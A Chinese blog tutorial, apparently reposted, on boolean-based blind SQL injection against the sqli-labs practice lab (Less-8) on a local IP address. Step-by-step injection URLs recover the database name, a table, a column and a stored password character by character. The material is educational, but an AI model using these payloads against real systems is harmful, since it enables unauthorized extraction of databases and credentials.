标签:139.129 Less -- 192.168 sqli --+ Mysql id 注入
千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。
---- 网易云热评
一、常用函数
1、mid(str,1,5):取字符串str的前5个字节
2、ord():转换成ASCII码
3、length():统计长度
4、 ascii():将字符转换ASCII
二、实例演示
1、and 1=1
访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确
2、and 1=2
访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误
3、判断数据库长度
http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8
http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误
4、判断数据库第一个字母
http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之
5、判断数据库第二个字母
http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”
6、获取表名,最终获取表名users
http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+
7、获取字段名,最终获取字段名password
http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+
8、获取字段内容,最终获取一个名为admin的内容
http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
标签:139.129,Less,--,192.168,sqli,--+,Mysql,id,注入 来源: https://blog.csdn.net/weixin_41489908/article/details/116805168
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。